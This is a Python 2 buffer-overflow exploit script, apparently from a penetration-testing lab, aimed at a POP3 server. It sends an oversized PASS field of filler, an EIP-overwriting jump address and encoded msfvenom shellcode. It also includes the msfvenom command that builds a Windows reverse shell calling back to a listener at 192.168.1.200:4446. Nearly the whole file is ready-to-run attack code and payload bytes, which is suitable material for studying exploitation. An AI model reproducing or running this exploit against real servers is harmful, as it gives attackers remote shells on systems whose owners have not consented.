
#!/usr/bin/python
#buffer to remain 3000 bytes

import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

#msfvenom -p windows/shell_reverse_tcp -a x86 --platform windows -n 8 -b '\x00\x0A\x0D' LPORT=4446 LHOST=192.168.1.200 -e x86/shikata_ga_nai -f python
#Payload size: 359 bytes
#Final size of python file: 1726 bytes
buf =  ""
buf += "\x27\x41\x2f\x2f\x91\x90\xd6\x41\xbe\x4a\x1e\xbd\xc8"
buf += "\xd9\xca\xd9\x74\x24\xf4\x5f\x29\xc9\xb1\x52\x31\x77"
buf += "\x12\x03\x77\x12\x83\xa5\xe2\x5f\x3d\xc5\xf3\x22\xbe"
buf += "\x35\x04\x43\x36\xd0\x35\x43\x2c\x91\x66\x73\x26\xf7"
buf += "\x8a\xf8\x6a\xe3\x19\x8c\xa2\x04\xa9\x3b\x95\x2b\x2a"
buf += "\x17\xe5\x2a\xa8\x6a\x3a\x8c\x91\xa4\x4f\xcd\xd6\xd9"
buf += "\xa2\x9f\x8f\x96\x11\x0f\xbb\xe3\xa9\xa4\xf7\xe2\xa9"
buf += "\x59\x4f\x04\x9b\xcc\xdb\x5f\x3b\xef\x08\xd4\x72\xf7"
buf += "\x4d\xd1\xcd\x8c\xa6\xad\xcf\x44\xf7\x4e\x63\xa9\x37"
buf += "\xbd\x7d\xee\xf0\x5e\x08\x06\x03\xe2\x0b\xdd\x79\x38"
buf += "\x99\xc5\xda\xcb\x39\x21\xda\x18\xdf\xa2\xd0\xd5\xab"
buf += "\xec\xf4\xe8\x78\x87\x01\x60\x7f\x47\x80\x32\xa4\x43"
buf += "\xc8\xe1\xc5\xd2\xb4\x44\xf9\x04\x17\x38\x5f\x4f\xba"
buf += "\x2d\xd2\x12\xd3\x82\xdf\xac\x23\x8d\x68\xdf\x11\x12"
buf += "\xc3\x77\x1a\xdb\xcd\x80\x5d\xf6\xaa\x1e\xa0\xf9\xca"
buf += "\x37\x67\xad\x9a\x2f\x4e\xce\x70\xaf\x6f\x1b\xd6\xff"
buf += "\xdf\xf4\x97\xaf\x9f\xa4\x7f\xa5\x2f\x9a\x60\xc6\xe5"
buf += "\xb3\x0b\x3d\x6e\x7c\x63\x3c\xa6\x14\x76\x3e\x27\xbb"
buf += "\xff\xd8\x2d\x53\x56\x73\xda\xca\xf3\x0f\x7b\x12\x2e"
buf += "\x6a\xbb\x98\xdd\x8b\x72\x69\xab\x9f\xe3\x99\xe6\xfd"
buf += "\xa2\xa6\xdc\x69\x28\x34\xbb\x69\x27\x25\x14\x3e\x60"
buf += "\x9b\x6d\xaa\x9c\x82\xc7\xc8\x5c\x52\x2f\x48\xbb\xa7"
buf += "\xae\x51\x4e\x93\x94\x41\x96\x1c\x91\x35\x46\x4b\x4f"
buf += "\xe3\x20\x25\x21\x5d\xfb\x9a\xeb\x09\x7a\xd1\x2b\x4f"
buf += "\x83\x3c\xda\xaf\x32\xe9\x9b\xd0\xfb\x7d\x2c\xa9\xe1"
buf += "\x1d\xd3\x60\xa2\x2e\x9e\x28\x83\xa6\x47\xb9\x91\xaa"
buf += "\x77\x14\xd5\xd2\xfb\x9c\xa6\x20\xe3\xd5\xa3\x6d\xa3"
buf += "\x06\xde\xfe\x46\x28\x4d\xfe\x42"


#buffer = As to overwrite EIP, a jmp esp, NOPS for room, shell code, Ds to keep the buffer the same size

buffer = "A" * 2606 + "\x8f\x35\x4a\x5f" + buf + "D" * 39

try:
	print "\nSending the buffer..."
	s.connect(('192.168.1.192',110))
	data = s.recv(1024)
        print data
	s.send('USER username' +'\r\n')
	data = s.recv(1024)
        print data
	s.send('PASS ' + buffer + '\r\n')
	print "\nDone!."
except:
    print "Could not connect to POP3!"